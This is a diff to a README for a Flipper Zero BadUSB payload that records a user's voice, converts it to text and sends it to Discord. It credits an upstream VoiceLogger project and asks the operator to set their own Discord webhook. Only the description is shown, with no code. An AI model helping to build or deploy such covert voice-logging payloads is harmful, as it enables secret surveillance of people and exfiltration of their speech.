Agente404/flipper/payloads/Voice2Discord/README.md

 # Keyloger 2 Discord

-This payload exfills user voice as text to discord
+This payload exfills user voice as text to Discord.
+Based on I'm Jackoby [VoiceLogger](https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/7f4899b95e2d0ad9457de2a07c9cb60733e24778/Payloads/VoiceLogger)

 You must edit the following parameters on the payload:
 * Hook - your Discord hook